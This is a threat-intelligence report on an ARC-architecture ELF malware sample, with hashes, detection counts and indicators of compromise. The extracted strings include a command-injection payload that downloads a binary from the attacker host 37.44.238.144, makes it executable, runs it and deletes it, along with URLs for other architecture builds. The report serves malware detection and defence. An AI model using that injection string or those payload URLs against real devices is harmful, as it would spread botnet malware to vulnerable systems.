DigitalSide Threat Intel

bin.arc

First submission 2023-01-23 03:00:02

File details

File type: ELF 32-bit LSB executable, ARC Cores Tangent-A5, version 1 (SYSV), statically linked, stripped
File type: 130.86 KB (134004 bytes)
MD5: 2b19491d22b844da5e00243fa952e8d9
SHA1: cc641770517ea92d3f2015531f9ee6325324cb0d
SHA256: 7b6b2369842c85bb2da2f9336dcc29f81c223d3ba010ffef7da70151c4172c0a
Virus Total: 34/62 VT report date: 2023-01-23 01:30:19

File features detected

Is DLL

Packers

Anti Debug

Anti VM

Signed

XOR

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://37.44.238.144/AkitaXss/bin.arc VirusTotal Report 37.44.238.144 VirusTotal Report 2023-01-23 03:00:03

Strings analysis - Possible IPs found 3

37.44.238.144
127.0.0.1
255.255.255.255

Strings analysis - Possible URLs found 5

http://37.44.238.144/AkitaXss/bin.arm7;chmod+777+bin.arm7;./bin.arm7;rm+-rf+bin.arm7%3b%23&remoteSubmit=Save
http://schemas.xmlsoap.org/soap/envelope/
http://37.44.238.144/AkitaXss/bin.x86
http://37.44.238.144/AkitaXss/bin.mips;
http://schemas.xmlsoap.org/soap/encoding/